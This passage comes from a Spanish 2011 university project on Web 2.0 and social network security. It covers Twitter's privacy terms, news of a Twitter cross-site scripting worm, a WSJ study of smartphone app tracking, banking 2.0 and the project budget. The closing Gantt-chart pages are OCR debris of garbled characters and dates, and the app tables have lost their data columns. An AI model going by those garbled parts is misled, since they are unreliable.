Twitter también ha sido criticado por sus términos de uso y de privacidad de la red. Al igual
que Facebook, toda la información de Twitter se envía y se procesa en Estados Unidos, bajo
legislación americana. Twitter declara en sus términos de uso que no solo registrara nuestros
datos personales que incluyamos en la red como nuestro teléfono móvil, sino que también
registrará la IP desde la que nos conectamos y el tipo de navegador con los favoritos, páginas
que visitamos o búsquedas, tengan que ver con Twitter o no, así declara:
“Log Data When you visit the Site, our servers automatically record information that your
browser sends whenever you visit a Website ("Log Data”). This Log Data may include
information such as your IP address, browser type or the domain, from which you are visiting,
the Web-pages you visit, the search terms you use, and any advertisements on which you
click. For most users accessing the Internet from an Internet service provider the IP address
will be different every time you log on. We use Log Data to monitor the use of the Site and of
our Service, and for the Site"™s technical administration.”
Página 340
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 341
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
15.3.7. Noticias
Veamos las noticias relacionadas con Twitter.
EL PAÍS.
Nueva invasión de mensaje en Twitter.
Fuente: EL PAÍS.
Fecha: 27.Sep.2010
Web:http://www.elpais.com/articulo/tecnologia/Nueva/invasion/mensajes/Twitter/elpepute
c/20100927elpeputec_1/Tes.
Ocurrió a última hora de ayer. El error duró menos de una hora pero no evitó el
bochorno de los usuarios de Twitter, que veían cómo perdían el control de su
cuenta y se sucedían los mensajes declarando su gusto por la zoofilia una y otra
vez.
Este es el segundo ataque grave que sufre Twitter en menos de una semana. El
motivo puede estar en una de las últimas decisiones tomadas por el servicio a raíz
de su rediseño y que tiene que ver con los enlaces acortados. Se crearon, en un
principio, para aprovechar mejor los 140 caracteres que permite cada envío. Sin
embargo, son cada vez más una fuente de problemas de seguridad. Así, Twitter ha
decidido que pronto sólo aceptará aquellos acortados por su servicio oficial, los
que son del tipo t.co.
Evaluación
Es un fallo de seguridad bastante grave que atenta contra la imagen de los usuarios de
Twitter, ya que se podrían publicar en nuestro perfil de Twitter mensajes que no deseamos de
manera involuntaria, y lo que es peor, que estos mensajes son ofensivos para el resto de
usuarios.
Ya son varios fallos de seguridad continuados, la siguiente noticia relata otro más grave y
anterior, pero prácticamente ocurridos en la misma semana.
Página 342
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
A Chinese woman was sentenced to one year in a labor camp on Wednesday after she
forwarded a satirical microblog message that urged recipients to attack the
Japanese Pavilion at the Shanghai World Expo, human rights groups said Thursday.
The woman, Cheng Jianping, 46, was accused of ― disturbing social order ‖ for
resending a Twitter message from her fiancé that mocked young nationalists who
held anti-Japanese rallies in several cities last month. The original message
sarcastically goaded protesters to go beyond the smashing of Japanese products and
express their fury at the heavily policed expo site.
Ms. Cheng was seized last month in the southeastern city of Wuxi on the same day
as her fiancé, Hua Chunhui. Mr. Hua, who was released five days later, told
reporters the two had planned to marry on the day of their detention.
Under China‘s legal system, the police can send people to so-called re-education
through labor for up to four years without trial. The system, thought to
accommodate as many as 300,000 detainees, has been criticized by legal reformers
who say it is easily abused. Such labor centers are largely populated by
pickpockets, drug users and prostitutes, but are also used as a punishment for
those guilty of political offenses. Once sentenced, people have little chance of
appeal.
Widely known by the online name Wang Yi, Ms. Cheng is avidly followed by a small
coterie of Chinese intellectuals who subscribe to Twitter, which is blocked in
China but can be reached by those willing to burrow beneath the government‘s
firewall. Most recently Ms. Cheng sent out messages praising the decision to award
the Nobel Peace Prize to the imprisoned rights activist Liu Xiaobo. Last August,
she was briefly detained after expressing sympathy for a detained democracy
advocate, Liu Xianbin.
(...)
Evaluación
Vemos como una mujer de 46 años en china es condenada a un año en el campo de trabajo
por re-twittear un mensaje en contra de las manifestaciones anti-japonesas realizadas por los
nacionalistas. Pero esto no solo quedo aquí sino que incito a estos manifestantes yendo más
allá de romper productos de origen japonés.
Página 343
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Twitter 'se vuelve loco' por culpa de una vulnerabilidad potencialmente peligrosa
20 MINUTOS.
Twitter “se vuelve loco” por una vulnerabilidad potencialmente peligrosa
Fuente: 20 MINUTOS/D.G./AGENCIAS
Fecha: 21.Sep.2010
Web:http://www.20minutos.es/noticia/820340/0/twitter/ataque/mensajes/
En la mañana del martes, los usuarios de Twitter comenzaron a ver cómo la popular
red de microblogging 'se volvía loca' enviando mensajes incomprensibles de forma
imparable mientras varias páginas Web anunciaban el "mayor ataque pirata" sufrido
por Twitter de su historia.
Otro efecto del ciberataque era que, al entrar en la Web, la imagen quedaba
congelada con varios colores y empezaba a redirigir a los internautas a otros
sitios, entre ellos páginas de contenido pornográfico.
Twitter advirtió de que los usuarios "podrían todavía ver 'retweets' (mensajes
reenviados) extraños en sus cuentas por el fallo", pero cree que no puede dañar
los equipos o cuentas de los usuarios. La empresa aclaró que "no hay necesidad de
cambiar las contraseñas" de la cuenta.
El origen del problema podría estar relacionado con un gusano que activó un
programador noruego, Magnus Holm, según informó el diario The New York Times, que
cita los propios mensajes del usuario. Holm explicó que lanzó el primer "gusano",
un programa malicioso que se multiplica, porque "quería experimentar con el fallo"
que ya otros habían explotado antes.
Twitter señaló también que el fallo se había detectado ya el pasado mes, pero
unaactualización de su Web lo activó de nuevo de manera no intencionada.
Evaluación
Se trata de una vulnerabilidad de Cross-site scripting bastante grave ya que el que al pasar el
ratón por encima de los tweets nos permite hacer clic y que se nos envié a otras Webs podría
hacer que se ejecutara código maligno en nuestro PC.
Página 344
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Fuente: EL PAÍS.
Fecha: 2.Sep.2010
Web:http://www.elpais.com/articulo/tecnologia/Twitter/almacenara/analizara/enlaces/publiquen/red/elpeputec/20100902elp
eputec_2/Tes
Twitter ha anunciado que almacenará y podrá analizar todos los enlaces que se
incluyan en los mensajes de la red social. Twitter empleará para ello su sistema
t.co que reduce la extensión de las direcciones de los enlaces que se adjuntan
para su publicación en los mensajes de la red. En el propio Twitter ya han
aparecido comentarios de internautas preocupados por lo que puede suponer esta
práctica de vulneración de la privacidad.
El conocimiento por parte de Twitter de los enlaces más populares puede ayudar a
la empresa a refinar sus recomendaciones y mejorar su programa publicitario de
tweets promocionales. Fuentes de Twitter alegan que este sistema permitirá mejorar
la detección y prevención de enlaces maliciosos. De hecho, permitirá, según la
compañía, analizar de forma automática los enlaces incrustados para comprobar que
no conduzcan a páginas que alberguen programas maliciosos. En este caso, se
anulará el enlace.
Sin embargo, la centralización de estos datos también preocupa desde otro frente,
el de la seguridad. Un fallo de seguridad permitiría obtener a terceros
información sobre quién clica y qué clica.
Página 345
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
15.3.8. Referencias
Webs:
Alex: Twitter 10 Rank: http://www.alexa.com/siteinfo/twitter.com
Twitter in Plain English: http://www.youtube.com/watch?v=ddO9idmax0o
List of Twitter services and applications:
http://en.wikipedia.org/wiki/List_of_Twitter_services_and_applications
How Twitter has born: http://www.140characters.com/2009/01/30/how-twitter-
was-born/
Historias de Twitter: http://www.cad.com.mx/historia_de_twitter.htm
Blogs:
Mundo Twitter: http://mundotwitter.es/
Twitter blog: http://blog.twitter.com/
Es Twitter: http://estwitter.com/
Otras noticias:
Twitter valdría ya 4.000 millones de dólares, según TechCrunch.
o Fuente: Europa Press
Fecha: 1.Dic.2010
http://www.europapress.es/economia/noticia-economia-telecos-twitter-
valdria-ya-4000-millones-dolares-techcrunch-20101201113519.html.
MahTweets, aplicación para Twitter con notificaciones push en Windows Phone 7.
o Fuente: Gizmóvil
Fecha: 29.Nov.2010
http://gizmovil.com/2010/11/mahtweets.
El «Twitter español» redefinirá el concepto de «microblogging».
o Fuente: La Razón
Fecha: 27.Nov.2010
http://www.larazon.es/noticia/5257-el-twitter-espanol-prepara-un-cambio-
que-redefinira-el-microblogging.
Cómo hallar trabajo en Twitter.
o Fuente: La Gaceta
Fecha: 20.Nov.2010
http://www.lagaceta.com.ar/nota/410604/Econom%C3%ADa/Como-hallar-
trabajo-Twitter.html.
Cara a cara en la era Twitter.
o Fuente: La Vanguardia
Fecha: 23.Oct.2010
http://www.lavanguardia.es/lv24h/20101123/54073738379.html.
Famosos le dicen adiós a Twitter.
o Fuente: El Universo
Fecha: 30.Nov.2010
Página 346
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
http://www.eluniverso.com/2010/11/30/1/1379/famosos-le-dicen-adios-
twitter.html?p=1354&m=27.
Twitter ya tiene su servicio de estadísticas.
o Fuente: ABC
Fecha: 18.Nov.2010
http://www.abc.es/20101118/medios-redes/twitter-analitycs-
201011181832.html.
El desafío de Twitter: La personalización, según su cofundador.
o Fuente: PC World
Fecha: --
http://www.pcwla.com/pcwla2.nsf/articulos/71757704D018AA94852577EA007
21D14.
La actividad mundial de Twitter en un día.
o Fuente: ABC
Fecha: 26.Nov.2010
http://www.abc.es/20101126/medios-redes/actividad-mundial-twitter-
201011261156.html.
Página 347
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 16
Anexos
Anexo A: Your Apps Are Watching You
Una investigación del The Wall Street Journal 62 (WSJ) muestra que las aplicaciones
desarrolladas para IPhone y Android violan la privacidad de los usuarios de estos
smartphones.
Hay pocos dispositivos que muestren más información sobre datos personales que los propios
teléfonos inteligente conteniendo información sobre el número de teléfono, la localización, el
nombre real del propietario y el ID del teléfono que es único y no existe la posibilidad de
cambiarlo o desactivarlo. Estos dispositivos están constantemente de manera regular
transmitiendo este tipo de información a través de sus aplicaciones.
Al examinar un total de 101 aplicaciones para estos teléfonos, tanto para Iphone como para
aplicaciones Android, se ha encontrado que 56 de ellas transmite el ID único del smartphone
sin el conocimiento de los propietarios. Un total de 47 de ellas transmiten la localización de
alguna manera y 5 de ellas envían datos sobre edad, sexo y otros datos personales a terceros.
Podemos ver el esfuerzo intrusivo de las empresas para recopilar información personal con el
fin de almacenar esta información detallada en sus bases de datos.
Respecto a la aplicación “Pandora” una aplicación popular de música, tanto para IPhone como
para Android, envían datos sobre edad, sexo y el ID del teléfono a diferentes redes públicas.
La aplicación “Libro-Mezcle”, un juego para tirar bolas de papel a una papelera envía datos al
62
Fuente: The Wall Street Journal, Artículo “Your Apps Are Watching You”.
http://online.wsj.com/article_email/SB10001424052748704694004576020083703574602-
lMyQjAxMTAwMDIwMjEyNDIyWj.html.
Página 348
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
menos 5 compañías de publicidad. Otra aplicación llamada “Grindr”, una aplicación para tener
encuentros gays, envía datos sobre sexo, ubicación y el ID del teléfono a 3 compañías de
publicidad.
"In the world of mobile, there is no anonymity" afirma Michael Becker de Mobile Marketing
Association, un grupo del sector. Un teléfono móvil "always with us. It's always on”.
La compañía Apple afirma revisar todas las aplicaciones antes de ofrecérselas a los usuarios,
para protegerlos del envío de ciertos tipos de información, como la localización. "We have
created strong privacy protections for our customers, especially regarding location-based data.
(…) Privacy and trust are vitally important” afirma Tom Neumayr de Apple.
Google no revisa as aplicaciones que pueden descargarse los usuarios de sus teléfonos como
Motorola o Samsung, dice que los responsables de la aplicación deben de asumirá la
responsabilidad de cómo manejarla información del usuario.
A pesar de esto se ha demostrado que esas reglas que establecen los fabricantes se pueden
eludir. Una aplicación para Iphone llamada “Pumpkin Maker”, transmite la localización de una
red sin el consentimiento del propietario. Apple se niega a comentar si la aplicación viola o no
las reglas.
Los usuarios de los teléfonos inteligentes no pueden hacer nada frente al envío de estos datos
personales frente a un gran número de aplicación. En los equipos de sobremesa tenemos la
posibilidad de eliminar las “tracking cookies” que hacen seguimiento de nuestras
navegaciones o navegar en modo incognito desde ciertos navegadores, pero con los
smartphones esto no es posible. "The great thing about mobile is you can't clear a UDID like you
can a cookie" afirma Meghan O’Holleran de Traffic MarketPlace, una red publicitaria de
Internet que se está expandiendo a aplicaciones móviles."That's how we track everything".
Holleran afirma que monitorizan a los usuarios de los smartphones siempre que pueden, "we
watch what apps you download, how frequently you use them, how much time you spend on
them, how deep into the app you go". Comenta que los datos se almacenan y que no se
vinculan a ningún usuario.
Los desarrolladores de las aplicaciones “TextPlus 4”, “Pandora” o “Grindr” se escudan en que
los datos que transmiten no van vinculados a ningún nombre de persona y que los datos de
edad y sexo requieren previa aceptación del usuario. Los desarrolladores de la aplicación
“Pumpkin Maker” dicen que no conocían que fuese necesario preguntar para obtener
aprobación del envío de la ubicación.
La falta de estándares en este ámbito hace que las compañías de smartphones hagan el
tratamiento de datos de manera diferente. Por ejemplo Apple trata el UDID como
“información de identificación personal”. Otras compañías, incluida Google, no tienen en
cuenta el ID de usuario para la identificación de información.
Esta industria creciente está reuniendo datos de los perfiles de los usuarios de los teléfonos
móviles. La empresa Mobclix, de intercambio de anuncios, coincide con más de 25 redes de
anuncios y 15.000 aplicaciones que buscan anunciantes. La empresa Palo Alto de California,
Página 349
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
recoge los ID’s de los teléfonos y los asigna a categorías de interés basándose en las descargas
de aplicaciones de los usuarios y la cantidad de tiempo que pasan con esas aplicaciones.
Mediante el seguimiento de la ubicación del smartphones, la compañía Mobclix hace una
“mejor estimación” de donde vive la persona, según Sr. Gurbuxani, ejecutivo de Mobclix. La
compañía compara con la localización los datos de gasto y demográficos.
Otras aplicaciones transmiten más datos todavía. La aplicación para teléfonos de MySpace
envía sexo, edad y el ID del dispositivo a Milenio, una red de publicidad muy grande.
Podemos desactivar los servicios de localización, pero limitará el uso de algunas funciones
como los mapas.
Algunas compañías de marketing ofrecen un “opt out”63 que previene del uso de datos de
seguimiento para ofrecer anuncios vistos en las webs de los smartphones. Pero la mayoría no
se aplica a las apps. Por ejemplo, Ringleader Digital Inc.'s “opt-out”
(ringleaderdigital.com/optout.php), solo se aplica en la navegación por internet desde el
browser.
63
El término “opt-out” se refiere a varios métodos por los cuales los usuarios pueden evitar la recepción
de productos no solicitados o de servicios de información. Esta capacidad se asocia por lo general con
las campañas de marketing directo como puede ser el telemarketing, marketing por correo electrónico
o correo ordinario. http://en.wikipedia.org/wiki/Opt-out.
Página 350
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
WSJ64 analizó 101 aplicaciones populares para IPhone y Android viendo el tipo de datos que
transmite y las compañías que monitorizan estas aplicaciones y crean perfiles de usuarios.
Tipos de datos
Los tipos de datos que transmiten las aplicaciones para smartphones más comunes son los
siguientes:
64
Del artículo “What The Know – Mobile” del WSJ, http://blogs.wsj.com/wtk-mobile/.
Página 351
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
App owner: son las compañías que crean o gestionan las aplicaciones. Una vez
que recopilan datos de los teléfonos, tienen algunas restricciones de cómo los
pueden usar.
Third parties: estas compañías incluyen vendedores que monitorizan las
aplicaciones y crean perfiles de usuarios.
Página 352
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Lite
Pumpkin Maker
RedLaser
Ringtone Maker
Ringtone Maker
Pro
Shazam
Talking Tom Cat
TextPlus 4
The Moron Test
The Moron Test:
Section 1
Tips & Tricks:
IPhone Secrets
Lite
TweetDeck
WSJ Mobile
Reader
The Weather
Channel
WhatsApp
Messenger
Yelp
YouTube
Advanced Task
Killer
Advanced Task
Killer Pro
Alchemy (Andrey
Zaikin)
Backgrounds
(Stylem Media)
Barcode Scanner
(Zxing Team)
Beautiful Widgets
Bible App
(LifeChurch.tv)
Calorie Counter
(FatSecret)
CardioTrainer
CBS News
DailyHoroscope
(Comitic)
Dictionary.com
ESPN
ScoreCenter
Facebook
Fishin' 2 Go
Foursquare
Fox News
Fruit Ninja
Google Maps
Groupon
Handcent SMS
Jewels
Labyrinth
Labyrinth Lite
LauncherPro
Movies by Flixster
MyBackup Pro
MySpace Mobile
NYTimes
Pandora
Paper Toss
Ringdroid
Robo Defense
Robo Defense
Free
Shazam
ShopSavvy
Barcode Scanner
Solitaire (Ken
Magic)
Talking Tom Cat
Talking Tom Cat
Free
The Coupons App
Toss It
TweetCaster
US Yellow Pages
Search
Página 353
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Weather &
Toggle Widget
The Weather
Channel
WeatherBug
WeatherBug Elite
Yelp
YouTube
Zedge Ringtones
& Wallpapers
Ilustración 109. Aplicaciones para Iphone. Tipos de datos.
Página 354
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Lite
TweetDeck
WSJ Mobile
Reader
The Weather
Channel
WhatsApp
Messenger
Yelp
YouTube
Advanced Task
Killer
Advanced Task
Killer Pro
Alchemy (Andrey
Zaikin)
Backgrounds
(Stylem Media)
Barcode Scanner
(Zxing Team)
Beautiful
Widgets
Bible App
(LifeChurch.tv)
Calorie Counter
(FatSecret)
CardioTrainer
CBS News
DailyHoroscope
(Comitic)
Dictionary.com
ESPN
ScoreCenter
Facebook
Fishin' 2 Go
Foursquare
Fox News
Fruit Ninja
Google Maps
Groupon
Handcent SMS
Jewels
Labyrinth
Labyrinth Lite
LauncherPro
Movies by
Flixster
MyBackup Pro
MySpace Mobile
NYTimes
Pandora
Paper Toss
Ringdroid
Robo Defense
Robo Defense
Free
Shazam
ShopSavvy
Barcode Scanner
Solitaire (Ken
Magic)
Talking Tom Cat
Talking Tom Cat
Free
The Coupons
App
Toss It
TweetCaster
US Yellow Pages
Search
Weather &
Toggle Widget
The Weather
Channel
WeatherBug
WeatherBug Elite
Yelp
YouTube
Zedge Ringtones
& Wallpapers
Ilustración 110. Aplicaciones para Android. Tipos de datos.
Página 355
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Algunos ejemplos
Vamos a ver gráficamente un par de ejemplos para ver los tipos de datos que se transmiten y a
qué compañía se transmiten.
Faeebook
Facebook recoge datos de Contactos, Username y Pasword y Localización y estos datos los
envía a sus propias bases de datos de Facebook.
Página 356
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Pandora
La aplicación pandora recopila información sobre sexo y edad, localización y ID del teléfono.
Esta información la envía a múltiples empresas de marketing que son AdMarvel,
Google/DoubleClick, Medialets y Mylife.com, obviamente sin informar al usuario de ello.
Página 357
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
La banca tradicional comenzó en papel sin ordenadores y sin Internet. Al introducirse los
bancos en Internet su presencia inicial fue básicamente informativa, información corporativas
y de principales productos financieros. Posteriormente se crearon sitios transaccionales,
consulta de saldos y transferencias electrónicas de fondos financieros. Los bancos más
innovadores hoy en día que son pocos disponen de un “canal electrónico”, venta de productos
en línea, ofertas personalizadas, pagos electrónicos e inversiones. Vemos una clara evolución
de la banca electrónica hacia la web 2.0.
Por parte del cliente también se ha visto una evolución clara. Estos son más exigentes en
cuanto a productos más sofisticados y mayor atención por parte de los asesores financieros.
Son más escépticos, menos leales debido a la gran demanda de productos por parte de las
diferentes entidades. Finalmente el consumidor actual es más activo y dispone de más
información; éstos cuentan con herramientas que les permiten tener información sobre
entidades y productos y servicios mediante blogs, foros o portales webs.
Implicaciones
Debido a esta evolución a la web 2.0 los servicios financieros deben adaptarse a un nuevo
mundo de comunicación ofreciendo así, nuevos productos y servicios más atractivos.
PayPal ( https://www.paypal.com/ )
Google Checkout (http://checkout.google.com)
Amazon Payments Server (https://payments.amazon.com)
Xoom (https://www.xoom.com)
Revolution Money Exchange (https://www.revolutionmoneyexchange.com/ )
Otros:
o http://www.click2pay.com/
Página 358
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
o http://www.trialpay.com/
o http://clickandbuy.com/
o http://www.revolutionmoney.com/
El 75% de los bancos estarán utilizando aplicaciones 2.0 para el 2012 según estudios Jarten.
La aplicación que tiene el participar en éstos blogs es variada. Se pueden hacer debates de
discusión, encuestas, publicar noticias, actualizaciones de la web, campañas de marketing,
codiseñar nuevos productos y servicios, tener en cuenta las opiniones de los clientes, poner
reacciones negativas en contexto, etc.
http://www.uwcu.org/RSS/
https://www.nscu.com/Feeds/rss.xml
http://feeds.feedburner.com/lespeoples
Twitters bancarios:
http://finanzas20.com/twitters-bancarios/
Página 359
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
A parte del mundo de los blogs, también es muy importante el marketing 2.0 por parte de
estas entidades financieras.
Banca social
Con las nuevas tendencias nacen los “préstamos sociales” eliminando a los bancos como
intermediarios en el proceso de los préstamos. Ahora los usuarios se prestan dinero entre
ellos mismos haciendo “social banking”.
La primera compañía pionera en social banking fue Zopa que une a comunidades de usuarios
que necesitan dinero con comunidades de usuarios que prestan dinero.
Prosper (http://www.prosper.com/)
Zopa (http://www.zopa.com)
Boober (http://www.booberinternational.com/) (http://www.boober.nl)
Virgin Money (http://uk.virginmoney.com/)
Fynanz (http://www.fynanz.com/)
BooberWatch.nl
http://partizipa.com/ (p2c empresa española)
Página 360
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Surgen nuevos medios de pago a particulares, para solucionar problemas con los medios de
pago tradicionales como el pago interpersonal, micropagos y pagos en movilidad.
Ahorros&Inversiones:
SmartyPig.com
Chipln.com
LoyaltyMatch.com
SocialPicks.com
Herdstreet (herdst.com)
BullPoo.com
MyFootbalClub.co.uk
Gestión Económica:
Wesabe.com
Mint.com
Geezeo.com
BillMonk.com
Bill.com
MoneyStrands + Expensr
Y en el futuro
Comunidad
En el futuro los bancos pueden agregar características de las redes sociales a sus plataformas:
Interacción
Los productos tradicionalmente siempre se han transmitido mejor de boca en boca. Los
usuarios pueden reenviar promociones a sus contactos y así desarrollar un marketing viral que
explote las redes sociales. Se podrían establecer acciones conjuntas ente diferentes usuarios.
Transparencia
Se podría permitir a los usuarios que califiquen las funcionalidades de la web y la usabilidad.
Una vez vistas estas calificaciones se podrían introducir mejoras, implementar nuevas
funcionalidades, etc.
Página 361
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Se podrían publicar comparaciones de productos entre la competencia viendo las tasas y las
comisiones. También se podrían publicar actualizaciones del sitio vía RSS como nuevos
productos, normativas, tasas, promociones, servicios, etc.
Personalización
La banca 2.0 tiende cada vez más a la personalización de los productos según el tipo de
cliente. Se podría hace una personalización Home Cliente donde el cliente elige la
información que quiere que aparezca en su espacio banca 2.0.
Otro tipo de personalización son las ofertas customizables. El cliente debería ser capaz de
adaptar sus ofertas según sus intereses entre unos rangos definidos y mediante parámetros
que se mueven en función de otros.
Una de las personalizaciones más al alcance de la mano son las aplicaciones financieras para
smartphones. Podemos consultar el “Top 25 Web 2.0 Apps for Money, Finance, and
Investment” en la web
http://www.yourcreditadvisor.com/blog/2006/11/top_25_web_20_a.html.
Plataformas abiertas
Se ha demostrado con el paso del tiempo que cuanto más libre es el software más capacidad
tienen las empresas de aprovechar los conocimientos de la comunidad en su favor para
desarrollar productos más innovadores y adaptados el usuario.
En lugar de restringir el negocio se puede abrir una plataforma del banco y publicar servicios
que puedan ser usados por terceros. Estableciendo unas restricciones de seguridad, se pueden
desarrollar funcionalidades que agregan valor a la relación del cliente con el banco.
Esto nos lleva a una relación Win-Win. Este término anglosajón trata de que el banco nos
ofrezca servicios adicionales por los que no cobra y genera beneficios extra en los clientes,
haciendo que el banco se diferencia de sus competidores, que sea una referencia para futuros
clientes y en resumen conseguir un mayor progreso empresarial incrementando el mercado
potencial año a año.
Página 362
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 17
Presupuesto
El proyecto se compone básicamente de 2 fases marcadas y tiene una duración total de 2
años. Las fases son un primer estudio general de la Web 2.0 y las redes sociales y una segunda
fase, enfocada a la seguridad y privacidad.
El cálculo del presupuesto total en base a las tareas y recursos utilizados se ha hecho
mediante la herramienta Microsoft Project, ya que es la más extendida para ello.
Como vemos el proyecto ha tenido una duración de 528 días, 3.652 horas y un coste total de
88.706 euros. El coste de personal según la hoja Excel ed la UC3M adjuntada en el proyecto
es de un total de 88.500 euros.
Página 363
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Los recursos humanos empleados han sido 2 Ingenieros Sénior y 2 Jefes de proyecto.
Principalmente desarrollado por 1 Ingeniero Sénior.
Los costes directos son muy reducidos. Básicamente los recursos utilizados ha sido bibliografía
de la biblioteca UC3M “Security in a Web 2.0+ world: a standards based approach” (50 euros
total), y el uso de recursos electrónicos: ordenador personal con sistema operativo Windows 7,
Microsoft Office, Microsoft Project, Wireshark (aplicación gratuita), etc. más viajes, fungible y PC
Mac BookPro (estimación total 1.640 euros). Los costes indirectos ascienden a 18.028 euros.
El presupuesto total del proyecto asciende a 108.168 euros, sumando costes directos
(1.640€), costes indirectos (18.028€) y costes de personal (88.500€).
Revisión de la primera parte Wed Tue 29/09/09 María Ángeles[20%]; Daniel Garzón[20%]; Daniel
09/09/09 González[20%]
Fin de la primera parte. Thu 01/10/09 Mon 05/10/09 María Ángeles[20%]; Daniel Garzón[20%]
Especificaciones de la
segunda parte
Página 364
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Día oficial de la presentación Mon 18/07/11 Mon 18/07/11 María Ángeles[20%]; Tribunal[20%]
del PFC
Página 365
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Esta información se obtenido del archivo Microsoft Project. Podemos verla reflejada en la
siguiente imagen:
I o ir.sk
M
TnkN Dme OoJ'Dtion
'"rt finish P,e<!«e:;:;o<S • Re:;ource ND......
./ ~
'"
Seguriditd H ~ rdw~re y M~!Í.l Ángeles(2O%]
" SOftware en servidorM
64 days Fri 30/10/09 Wed 27/01/10 9
>O
U ./ ~ CM' 10 days Th u 28/01/10 wed 10/02/10 10 M~!Í.l Ánge les(2O%]
U ./ ~ Oew rro llo de Segurid~d 18 days Thu 11/02/10 Mon 08/03/10 11 M~!Í.l Ángeles(2O%]
en Lengu~jM y
Tecnologfas
." ./
./ '"
~
Oud~~
Rellisión del material
hastctla fecha
Od~ys
9days
Wed 10/ 03/ 10 wed 10/03/10
Wed 10/03/ 10 Sun 21/03/10
"
O~nie l Garzón(2O%];M
Ma!Í.l Ángeles(2O%]
" ./
./
'"
~
Se recoge bibliograf ia
de la UC3M
Odays Mon 22/03/10 Mon 22/03/10 Libro
Maria Ángeles(2O%]
" Se induyen ckn nUel/a5
partes: Legi ~ liKión y
12 days Tue 23/03/10 Wed 07/04/10 14
Prilladdad
" ./
'" PubliQKión OWASPTop Odays
Ten lIulne ... bilidades
w,b
Tue 20/04/10 Tue 20/04/ 10
./ ~ Ma!Í.l Ángeles(2O%]
" RMtruduradó n de
LenguajM y Tecnologias
53 days Th u 08/04/10 Mon 21/06/10
"
./ ~ Estudio de ~onexiÓfl
" F¡ocebook n Gmai l
16 days Tue 22/06/10 Tue 13/07/ 10
" Ma!Í.l Ángeles(2O%]
./ ~
" Ingeniería socia l y
Mlliod.J re~de seguriWd
9days Wed 14/ 07/ 10 Mon 26/07/10
" Ma!Í.l Ángeles(2O%]
>O
n ./ ~ PrilliKidad 2.0 16 days Tue 27/07/10 Tue 17/ 08/ 10 20 Mari~ Ángeles(2O%]
./ ~ Ma!Í.l Ángeles(2O%]
" Segu riditd Ha rdw~re y
Software en ellitdo del
19 days Wed 18/ OS/ 10 Mon 13/00/10 21
diente
./ ~ Mari~ Ángeles(2O%]
" ReestruduriKiÓfl del 10 days Tue 14/00/10 Mon 27/00/10 22
,. ./ ~
contenido del PFC
Casos de uso 15 days Tue 28/00/10 Mon 18/10/10 23 Mari~ Ángeles(2O%]
./ ~ Ma!Í.l Ángeles(2O%]
" ./ ~
LegistiKión 12 days Tue 19/10/10 W@d03/11/10 24
./ ~ Ma!Í.l Angeles(2O%]
"
~ ./ ~
Rellisión segunda parte 22 days
Rel/isión de la totctlidad 60 days
Tue 28/12/10
Thu 27/01/11
W@d26/01/11 28
W@d20/04/11 29;26 Maria Ángeles(2O%]
del PFC. Implementctr
grandes cam bios
./ ~ ., Ma!Í.l Angeles(2O%]
" Desarrollo de la
presentación y
57 days Th u 21/04/11 FriOS/07/ 11
estim.¡;ión del
presupuestototal
./ ".
" Oía ofidal de la
presentación del PfC
Odays Mon 18/07/11 Mon 18/07/11 Maria
Angele5[2O%]:Trlbuna l
Página 366
01, , 1 01 ... ,""" 01 "" .... l., O, ..",), O, ... 01', 01 .. ",.,"" 01"'-~ "" ' .. ' 011« .... ' 0,,, .. .1 ,
" .0-0
C!>fT\ i ~n","~ IPF C .t... . .
,,~, 'O 01''00 W,Q O,,, ~ 11 ~ '1' 25101 ¡¡
rcdoof'"'1 _ 'el Go-r.r ih {' ''''1 o..nód Gono!n[' ''''J
1 II J 111O~ I¡ , ~,.,.... OIi/W 10 O 11 l ? 11 ~ "U ¡4IOl ¡¡~I I1
111 111.,
t, 1>" 0 1
r~ .• .•
Defini<io n,J.,l.
es~i l i«><i<o n
~rr<>M<>MI , p'im,,,,
~ rt ~ d<oI~ f C
o.".""II"okl. p, i ll""~
Imt~deI ~ f C
~,~
¡ . . ,... . . . .['. .
E . ~ i l i«JOJ c ne5do lo
>eJ.u,oJ.rpdl l"
CDmicnlO do! <l<=rrollo I
d . l. "' l u ndrrfMWI~ '¡" 1
'"
I ~·~=:~
~",id "¡ H",t..· .,. ~ V
